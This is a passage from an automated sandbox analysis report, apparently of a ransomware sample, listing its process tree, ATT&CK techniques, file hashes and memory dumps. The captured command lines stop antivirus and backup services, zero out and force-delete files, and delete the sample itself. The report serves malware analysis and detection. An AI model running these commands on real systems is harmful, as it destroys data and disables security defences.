    "net.exe" stop AcrSch2Svc /y
    3⤵
    PID:4912
- - C:\Windows\System32\mshta.exe
    "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta
    3⤵
    PID:4564
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
    3⤵
    PID:4296
  - - C:\Windows\system32\PING.EXE
      ping 127.0.0.7 -n 3
      4⤵
      Runs ping.exe
      PID:4828
  - - C:\Windows\system32\fsutil.exe
      fsutil file setZeroData offset=0 length=524288 “%s”
      4⤵
      PID:4524
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\file.exe
    3⤵
    PID:4104
  - - C:\Windows\system32\choice.exe
      choice /C Y /N /D Y /T 3
      4⤵
      PID:4724

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop DefWatch /y
1⤵
PID:4732

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SavRoam /y
1⤵
PID:3080

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop RTVscan /y
1⤵
PID:2784

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
1⤵
PID:4652

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBCFMonitorService /y
1⤵
PID:5044

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBIDPService /y
1⤵
PID:4228

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sophos /y
1⤵
PID:5876

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CASAD2DWebSvc /y
1⤵
PID:5868

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CAARCUpdateSvc /y
1⤵
PID:5884

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
1⤵
PID:5860

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
1⤵
PID:5852

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:188

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4392

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:184

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Winlogon Helper DLL

T1004

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

File Deletion

T1107

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5
8592ba100a78835a6b94d5949e13dfc1

SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020

SHA256
fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
a0ba59588a2b9fc5fcea53c24dcd253b

SHA1
436d1bf0dd0d2ab6250bffdd8a717cd06faf6a73

SHA256
9e52647c1352f0f14d5f7c786e84944937ee811695c621ad4cab8bc132f792e8

SHA512
8dc16c33e00ca01309bcc2ec56ea03e6d43f7daaee7dfbb7546434e173c75e03ad2bbe6ba8582e0f0efd410de428fb18263d0461052c8b3c022ce7a4d8cc81ba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
3792070f16babcbae68b5802e566012e

SHA1
74f1851192d46a3eee8fe4a4162fe17b3df0488a

SHA256
5a922b443636f9d1dc996d83964bbafa8eb7267bdd026a405305392f8e8be712

SHA512
a0778cd1a510d8bd654badcdbbe077d46c45319f97bdf67f5f9f5191d3f10c0e33a1db2a7a45baaf7ca20d81fa152383e324699d22e0950e19b676f6d2aab5f3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
807fcf9ca24fdd7d19503001354a4a62

SHA1
3843e6807a76ad6f16657b524e991b612a2a2aa1

SHA256
8d75c6ebac5d39685e76fb9fde31f73a7dddbb3789c1d1c82aabbfbbae9f592b

SHA512
9fcfd18de6580d74def9ef876f4eb9de6526e7c35193e6a252781f25de222e2c20318375874054dc6ba59bdd0f79b131b30c0e6e31e7a9c76f1dcf71b7ccd096

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
dd8f41e2d1b4ab26fa89ffa53fa1d1bf

SHA1
48fefe75d1d36834df7ad0d4c1d07ae0b64dad66

SHA256
7f6741abaae19bfdfbf7409045f3b6dd488d3a4e0ec7a2ce4fb9a154db5512cd

SHA512
0375ebcdbf2a610b23bcabfc243a309e2ca9903a67efb6ebde8d6c2cbfdf2117a7bc3817635fb737b8b7689abbffb67506584440dc495be3586c9b0807de149c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
66dec5f9a38f7827f3178788241bf7f0

SHA1
ca9cb116a9078d6bdf6df5074bbc0a6fcb59f381

SHA256
89a6019e40b349c30f77de819b4c38c6b46e7ff2a3b8488afc2a6c8021694a2f

SHA512
715e48fe8a78caf4483aecad1271e7add8149a1be836992152a989c21e874fa22cce636c308e1e6aa5f9ff1f16c2cc733939b2926dbf682dcdc1e81c91857fc7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
6e1ab3e129e4203846427779b1b615d0

SHA1
a081a106f85d41318e64a8e2a22bfb06c9eaf33e

SHA256
d18ab4716c3d5f2017e3549eca6b8e7676894abdb465acd321625abae70ba172

SHA512
38421099f85dab83cac160fd43b4acdcd14179c3a73d096b99abfe8923df82797dc811e214194dbfa891ded3b653a08b5a0e03d906bd201efb11a27c1e11a197

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
6e1ab3e129e4203846427779b1b615d0

SHA1
a081a106f85d41318e64a8e2a22bfb06c9eaf33e

SHA256
d18ab4716c3d5f2017e3549eca6b8e7676894abdb465acd321625abae70ba172

SHA512
38421099f85dab83cac160fd43b4acdcd14179c3a73d096b99abfe8923df82797dc811e214194dbfa891ded3b653a08b5a0e03d906bd201efb11a27c1e11a197

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
d75b922cb2c43553d3f8f30ccdb9e9fc

SHA1
4fe95e70af6e148126176294e2915ca929bd8428

SHA256
da5c097737a2d79d23b16d2cf28ff5016f22c7262c139cf86043f49b929bb49a

SHA512
ba65a2a70a10c74ed22561f3839359d78253543b5b367ff5a56c88d8b72d81c1341e065ec3d282cd81410871dea63dcd67dc1a6d2d12b79b1a3ccd009fc7a834

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
7d1397d910ab2d6f519aaae673829888

SHA1
5ac6ddf2d7b11cd9ae34093daa901e0dddaebca5

SHA256
137a0ce88ef7b1ab636906ef04e138fed3f05a31102419316d15394000d9f6c6

SHA512
9707ee0cdb410a255d82415939bcf92a8ddf0a27852bad33e3458b1037e72485ba5d90240fc5e7c8a57c67c09d75a07afe926dbdd6c6f7d56a4edbb4f3aa09a0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
75925de2801e5a1dab4e8aad27b91044

SHA1
8cf18d2e381084d90bfe532741fd26ed3b2175dd

SHA256
f941ac1ff51198327a83eae40334ae7848f5cdee1772305245080b77e0510c9d

SHA512
d255360b07e5c64e1a1b4c24aa11134e278b4fcf8fec376b35b97ca7d99b02e73949067c26e26f614dc92ba6f4b622d0f38ddf2823d8ec3c91cfc50db5bd6ef9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
75925de2801e5a1dab4e8aad27b91044

SHA1
8cf18d2e381084d90bfe532741fd26ed3b2175dd

SHA256
f941ac1ff51198327a83eae40334ae7848f5cdee1772305245080b77e0510c9d

SHA512
d255360b07e5c64e1a1b4c24aa11134e278b4fcf8fec376b35b97ca7d99b02e73949067c26e26f614dc92ba6f4b622d0f38ddf2823d8ec3c91cfc50db5bd6ef9

Download Submit
C:\Users\Admin\AppData\Local\Temp\file.exe

MD5
e01e11dca5e8b08fc8231b1cb6e2048c

SHA1
4983d07f004436caa3f10b38adacbba6a4ede01a

SHA256
58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f

SHA512
298bfb9fe55ddd80f1c6671622d7e9e865899a855b5bb8e0d85d8520160cedca6fd8bc72c9881925477bcab883bf6e6f4c69f997b774b74fe992e023a81269de

Download Submit
C:\Users\Admin\AppData\Local\Temp\file.exe

MD5
e01e11dca5e8b08fc8231b1cb6e2048c

SHA1
4983d07f004436caa3f10b38adacbba6a4ede01a

SHA256
58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f

SHA512
298bfb9fe55ddd80f1c6671622d7e9e865899a855b5bb8e0d85d8520160cedca6fd8bc72c9881925477bcab883bf6e6f4c69f997b774b74fe992e023a81269de

Download Submit
C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta

MD5
a6858f488bcb85c4ce1967dcb8980f99

SHA1
8e8fb66bc9d688153182285546ae2ae6e3f40ff9

SHA256
65c8180228e4edb725ddf2e11493eeca2ad10906e3000c8c6f0d9ad2d6fb471e

SHA512
0c75799b425a98b9b900c3efe7afe4816f346405353d5c91f831390ce13fe3b405ff0d8d5e6a8fe54660de46be775e1154e4a10904e113f325764cbd8de1e25b

Download Submit
memory/184-270-0x0000000000000000-mapping.dmp

Download
memory/188-272-0x0000000000000000-mapping.dmp

Download
memory/496-275-0x0000000000000000-mapping.dmp

Download
memory/668-271-0x0000000000000000-mapping.dmp

Download
memory/1188-274-0x0000000000000000-mapping.dmp

Download
memory/1312-233-0x0000013A7D368000-0x0000013A7D369000-memory.dmp

Filesize
4KB

Download
memory/1312-157-0x0000000000000000-mapping.dmp

Download
memory/1312-214-0x0000013A7D366000-0x0000013A7D368000-memory.dmp

Filesize
8KB

Download
memory/1312-198-0x0000013A7D360000-0x0000013A7D362000-memory.dmp

Filesize
8KB

Download
memory/1312-202-0x0000013A7D363000-0x0000013A7D365000-memory.dmp

Filesize
8KB

Download
memory/1520-263-0x0000000000000000-mapping.dmp

Download
memory/1524-212-0x000001DE54346000-0x000001DE54348000-memory.dmp

Filesize
8KB

Download
memory/1524-234-0x000001DE54348000-0x000001DE54349000-memory.dmp

Filesize
4KB

Download
memory/1524-156-0x0000000000000000-mapping.dmp

Download
memory/1524-189-0x000001DE54340000-0x000001DE54342000-memory.dmp

Filesize
8KB

Download
memory/1524-191-0x000001DE54343000-0x000001DE54345000-memory.dmp

Filesize
8KB

Download
memory/1744-133-0x00000211C4A30000-0x00000211C4A32000-memory.dmp

Filesize
8KB

Download
memory/1744-120-0x0000000000000000-mapping.dmp

Download
memory/1744-126-0x00000211C4AE0000-0x00000211C4AE1000-memory.dmp

Filesize
4KB

Download
memory/1744-129-0x00000211DD280000-0x00000211DD281000-memory.dmp

Filesize
4KB

Download
memory/1744-134-0x00000211C4A33000-0x00000211C4A35000-memory.dmp

Filesize
8KB

Download
memory/1744-135-0x00000211C4A36000-0x00000211C4A38000-memory.dmp

Filesize
8KB

Download
memory/1872-210-0x0000029032CD3000-0x0000029032CD5000-memory.dmp

Filesize
8KB

Download
memory/1872-235-0x0000029032CD8000-0x0000029032CD9000-memory.dmp

Filesize
4KB

Download
memory/1872-207-0x0000029032CD0000-0x0000029032CD2000-memory.dmp

Filesize
8KB

Download
memory/1872-216-0x0000029032CD6000-0x0000029032CD8000-memory.dmp

Filesize
8KB

Download
memory/1872-159-0x0000000000000000-mapping.dmp

Download
memory/2172-300-0x0000000000000000-mapping.dmp

Download
memory/2456-261-0x0000000000000000-mapping.dmp

Download
memory/2636-262-0x0000000000000000-mapping.dmp

Download
memory/2784-286-0x0000000000000000-mapping.dmp

Download
memory/2848-242-0x0000000000000000-mapping.dmp

Download
memory/2860-217-0x00000262D5E26000-0x00000262D5E28000-memory.dmp

Filesize
8KB

Download
memory/2860-196-0x00000262D5E23000-0x00000262D5E25000-memory.dmp

Filesize
8KB

Download
memory/2860-175-0x0000000000000000-mapping.dmp

Download
memory/2860-241-0x00000262D5E28000-0x00000262D5E29000-memory.dmp

Filesize
4KB

Download
memory/2860-193-0x00000262D5E20000-0x00000262D5E22000-memory.dmp

Filesize
8KB

Download
memory/3080-284-0x0000000000000000-mapping.dmp

Download
memory/3356-264-0x0000000000000000-mapping.dmp

Download
memory/3640-273-0x0000000000000000-mapping.dmp

Download
memory/3676-277-0x0000000000000000-mapping.dmp

Download
memory/3832-267-0x0000000000000000-mapping.dmp

Download
memory/3836-269-0x0000000000000000-mapping.dmp

Download
memory/3844-287-0x0000000000000000-mapping.dmp

Download
memory/3972-219-0x00000166E0196000-0x00000166E0198000-memory.dmp

Filesize
8KB

Download
memory/3972-158-0x0000000000000000-mapping.dmp

Download
memory/3972-236-0x00000166E0198000-0x00000166E0199000-memory.dmp

Filesize
4KB

Download
memory/3972-205-0x00000166E0190000-0x00000166E0192000-memory.dmp

Filesize
8KB

Download
memory/3972-206-0x00000166E0193000-0x00000166E0195000-memory.dmp

Filesize
8KB

Download
memory/4016-114-0x0000000000000000-mapping.dmp

Download
memory/4016-119-0x000000001B650000-0x000000001B652000-memory.dmp

Filesize
8KB

Download
memory/4016-117-0x0000000000A00000-0x0000000000A01000-memory.dmp

Filesize
4KB

Download
memory/4040-276-0x0000000000000000-mapping.dmp

Download
memory/4104-297-0x0000000000000000-mapping.dmp

Download
memory/4124-240-0x0000018D9FC88000-0x0000018D9FC89000-memory.dmp

Filesize
4KB

Download
memory/4124-181-0x0000000000000000-mapping.dmp

Download
memory/4124-220-0x0000018D9FC86000-0x0000018D9FC88000-memory.dmp

Filesize
8KB

Download
memory/4124-201-0x0000018D9FC83000-0x0000018D9FC85000-memory.dmp

Filesize
8KB

Download
memory/4124-199-0x0000018D9FC80000-0x0000018D9FC82000-memory.dmp

Filesize
8KB

Download
memory/4152-292-0x0000000000000000-mapping.dmp

Download
memory/4156-229-0x000002AEC6273000-0x000002AEC6275000-memory.dmp

Filesize
8KB

Download
memory/4156-239-0x000002AEC6276000-0x000002AEC6278000-memory.dmp

Filesize
8KB

Download
memory/4156-223-0x0000000000000000-mapping.dmp

Download
memory/4156-250-0x000002AEC6278000-0x000002AEC6279000-memory.dmp

Filesize
4KB

Download
memory/4156-228-0x000002AEC6270000-0x000002AEC6272000-memory.dmp

Filesize
8KB

Download
memory/4184-285-0x0000000000000000-mapping.dmp

Download
memory/4188-247-0x0000020E9B198000-0x0000020E9B199000-memory.dmp

Filesize
4KB

Download
memory/4188-230-0x0000020E9B196000-0x0000020E9B198000-memory.dmp

Filesize
8KB

Download
memory/4188-184-0x0000000000000000-mapping.dmp

Download
memory/4188-203-0x0000020E9B190000-0x0000020E9B192000-memory.dmp

Filesize
8KB

Download
memory/4188-204-0x0000020E9B193000-0x0000020E9B195000-memory.dmp

Filesize
8KB

Download
memory/4192-303-0x0000000000000000-mapping.dmp

Download
memory/4204-266-0x0000000000000000-mapping.dmp

Download
memory/4224-265-0x0000000000000000-mapping.dmp

Download
memory/4228-291-0x0000000000000000-mapping.dmp

Download
memory/4244-306-0x0000000000000000-mapping.dmp

Download
memory/4252-280-0x0000000000000000-mapping.dmp

Download
memory/4256-302-0x0000000000000000-mapping.dmp

Download
memory/4292-208-0x000002CB2B290000-0x000002CB2B292000-memory.dmp

Filesize
8KB

Download
memory/4292-231-0x000002CB2B296000-0x000002CB2B298000-memory.dmp

Filesize
8KB

Download
memory/4292-246-0x000002CB2B298000-0x000002CB2B299000-memory.dmp

Filesize
4KB

Download
memory/4292-209-0x000002CB2B293000-0x000002CB2B295000-memory.dmp

Filesize
8KB

Download
memory/4292-194-0x0000000000000000-mapping.dmp

Download
memory/4312-243-0x0000000000000000-mapping.dmp

Download
memory/4332-305-0x0000000000000000-mapping.dmp

Download
memory/4340-283-0x0000000000000000-mapping.dmp

Download
memory/4352-288-0x0000000000000000-mapping.dmp

Download
memory/4360-268-0x0000000000000000-mapping.dmp

Download
memory/4380-282-0x0000000000000000-mapping.dmp

Download
memory/4392-244-0x0000028EA0718000-0x0000028EA0719000-memory.dmp

Filesize
4KB

Download
memory/4392-213-0x0000028EA0713000-0x0000028EA0715000-memory.dmp

Filesize
8KB

Download
memory/4392-200-0x0000000000000000-mapping.dmp

Download
memory/4392-211-0x0000028EA0710000-0x0000028EA0712000-memory.dmp

Filesize
8KB

Download
memory/4392-232-0x0000028EA0716000-0x0000028EA0718000-memory.dmp

Filesize
8KB

Download
memory/4400-304-0x0000000000000000-mapping.dmp

Download
memory/4480-296-0x0000000000000000-mapping.dmp

Download
memory/4492-289-0x0000000000000000-mapping.dmp

Download
memory/4628-279-0x0000000000000000-mapping.dmp

Download
memory/4652-293-0x0000000000000000-mapping.dmp

Download
memory/4732-278-0x0000000000000000-mapping.dmp

Download
memory/4820-290-0x0000000000000000-mapping.dmp

Download
memory/4824-281-0x0000000000000000-mapping.dmp

Download
memory/4852-301-0x0000000000000000-mapping.dmp

Download
memory/4876-221-0x000001B97AFC0000-0x000001B97AFC2000-memory.dmp

Filesize
8KB

Download
memory/4876-215-0x0000000000000000-mapping.dmp

Download
memory/4876-248-0x000001B97AFC8000-0x000001B97AFC9000-memory.dmp

Filesize
4KB

Download
memory/4876-237-0x000001B97AFC6000-0x000001B97AFC8000-memory.dmp

Filesize
8KB

Download
memory/4876-222-0x000001B97AFC3000-0x000001B97AFC5000-memory.dmp

Filesize
8KB

Download
memory/4932-238-0x000001981ADF6000-0x000001981ADF8000-memory.dmp

Filesize
8KB

Download
memory/4932-224-0x000001981ADF0000-0x000001981ADF2000-memory.dmp

Filesize
8KB

Download
memory/4932-249-0x000001981ADF8000-0x000001981ADF9000-memory.dmp

Filesize
4KB

Download
memory/4932-218-0x0000000000000000-mapping.dmp

Download
memory/4932-225-0x000001981ADF3000-0x000001981ADF5000-memory.dmp

Filesize
8KB

Download
memory/4960-299-0x0000000000000000-mapping.dmp

Download
memory/5008-298-0x0000000000000000-mapping.dmp

Download
memory/5020-307-0x0000000000000000-mapping.dmp

Download
memory/5024-308-0x0000000000000000-mapping.dmp

Download
memory/5028-294-0x0000000000000000-mapping.dmp

Download
memory/5044-295-0x0000000000000000-mapping.dmp

Download